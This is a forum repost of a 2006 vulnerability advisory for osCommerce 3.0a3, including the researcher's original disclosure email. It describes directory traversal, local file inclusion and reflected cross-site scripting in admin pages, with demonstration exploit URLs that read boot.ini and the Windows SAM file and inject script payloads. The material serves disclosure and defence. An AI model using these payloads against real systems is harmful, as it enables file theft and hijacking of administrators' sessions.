Don Posted December 9, 2006 Report Posted December 9, 2006 Version(s): 3.0a3Description: Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks.The 'admin/templates_boxes_layout.php' does not properly validate user-supplied input in the 'filter' parameter. A remote user can supply a specially crafted request to view files on target system.Some demonstration exploit URLs are provided:[url]http://[target]/admin/templates_boxes_layout.php?se[/url] t=boxes&filter=../../our_evil_php_file&lID=27[url]http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00[/url]A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.Some demonstration exploit URLs are provided:[url]http://[target]/oscommerce/admin/modules.php?set=shipping[/url]%22%3E%3Cscr ipt%3Ealert('xss')%3C/script%3E[url]http://[target]/definitiva/admin/customers.php?selected_box=customers[/url]%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT %3E[url]http://[target]/oscommerce/admin/languages_definitions.php?lID=1[/url]%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E[url]http://[target]/oscommerce[/url] /admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_productThe original advisory is available at:[url]http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html[/url]Impact: A remote user can view files on the target system.A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.Solution: No solution was available at the time of this entry.Vendor URL: [url]http://www.oscommerce.com/[/url] (Links to External Site)Cause: Input validation errorUnderlying OS: Linux (Any), UNIX (Any), Windows (Any)Reported By: Lostmon <lostmon@gmail.com>Message History: None. Source Message ContentsDate: Thu, 7 Dec 2006 10:31:42 +0100From: Lostmon <lostmon@gmail.com>Subject: Oscommerce 3.0a3 traversal arbitrary file access############################################Oscommerce traversal arbitrary file accessVendor:[url]http://www.oscommerce.com/about/news,125[/url]Advisore:[url]http://lostmon.blogspot.com/2006/12[/url]/oscommerce-traversal-arbitrary-file.htmlVendor notify:NO Exploit available: YES###########################################osCommerce contains a flaw that allows a remote traversalarbitrary file access.This flaw exists because the applicationdoes not validate filter variable upon submission toadmin/templates_boxes_layout.php script.This could allow aremote authenticated administrator to create a speciallycrafted URL that would execute '../' directory traversalcharacters to view files on the target system withthe privileges of the target web service.####################versions####################Oscommerce 3.0a3###################SOLUTION###################No solution was available at this time.################timeline################Discovered:11-11-2006vendor notify:-----vendor response:----disclosure:07-12-2006#################Examples#######################################traversal file access######################wen we try to open[url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url]set=boxes&filter=[SOME WORD]&lID=27the aplication returns a full path disclosure andreturns this error:Warning: require(includes/templates/[SOME WORD].php) [function.require]:failed to open stream: No such file or directory in C:AppServwwwoscommerceadmintemplatespagestemplates_boxes_layout.php on line 13Fatal error: require() [function.require]: Failed opening required'includes/templates/[SOME WORD].php' (include_path='.;C:php5pear')in C:AppServwwwoscommerceadmintemplatespagestemplates_boxes_layout.php on line 13the aplication add the .php extension to our [SOME WORD] ummmand it searh for the file in a folder inside webserverwe can include any php file located on the web serverin the aplication and it is executed(local file inclusion)[url]http://[victim]/admin/templates_boxes_layout.php?[/url]set=boxes&filter=../../our_evil_php_file&lID=27if we try to read a file outside webserver folder with a non phpextension can try for test this...&filter=../../../../file.extension%00 for look for example boot.iniin a windows system[url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url]set=boxes&filter=../../../../BOOT.INI%00&lID=27[url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url]set=content&filter=../../../../windows/repair/sam%00&lID=27#####################Cross site scripting#####################[url]http://localhost/oscommerce/admin/modules.php?set=shipping[/url]%22%3E%3Cscript%3Ealert('xss')%3C/script%3E[url]http://localhost/definitiva/admin/customers.php?selected_box=customers[/url]%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E[url]http://localhost/oscommerce/admin/languages_definitions.php?lID=1[/url]%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E[url]http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT[/url]%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product######################## €nd #####################Thnx to Estrella to be my ligth.-- atentamente:Lostmon (lostmon@gmail.com)Web-Blog: [url]http://lostmon.blogspot.com/[/url]-- La curiosidad es lo que hace mover la mente.. Quote
